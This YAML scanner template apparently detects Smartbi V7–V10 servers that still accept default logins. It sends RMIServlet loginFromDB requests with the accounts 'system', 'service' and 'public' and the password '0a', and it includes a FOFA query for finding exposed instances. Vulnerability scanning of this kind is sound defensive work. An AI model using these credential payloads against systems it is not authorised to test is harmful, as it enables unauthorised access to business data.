id: smartbi-default-user-weakpass

info:
  name: Smartbi Default User Weak Password
  author: xpoc
  severity: high
  verified: true
  description: |
    FOFA: app="SMARTBI"
  solutions: "V7 <= Smartbi <= V10"
  reference:
    - https://stack.chaitin.com/techblog/detail?id=113
  tags: smartbi,weakpass
  created: 2023/06/23

rules:
  r0:
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["system","0a"]
    expression: response.body.bcontains(b'"result":true')
  r1:
    request:
      method: POST
      path: /vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["system","0a"]
    expression: response.body.bcontains(b'"result":true')
  r2:
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["service","0a"]
    expression: response.body.bcontains(b'"result":true')
  r3:
    request:
      method: POST
      path: /vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["service","0a"]
    expression: response.body.bcontains(b'"result":true')
  r4:
    request:
      method: POST
      path: /smartbi/vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["public","0a"]
    expression: response.body.bcontains(b'"result":true')
  r5:
    request:
      method: POST
      path: /vision/RMIServlet
      body: |
        className=UserService&methodName=loginFromDB&params=["public","0a"]
    expression: response.body.bcontains(b'"result":true')
  r6:
    request:
      method: GET
      path: /smartbi/vision/RMIServlet
    expression: response.body.bcontains(b'"retCode":"CLIENT_USER_NOT_LOGIN"') 
  r7:
    request:
      method: GET
      path: /vision/RMIServlet
    expression: response.body.bcontains(b'"retCode":"CLIENT_USER_NOT_LOGIN"') 
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7()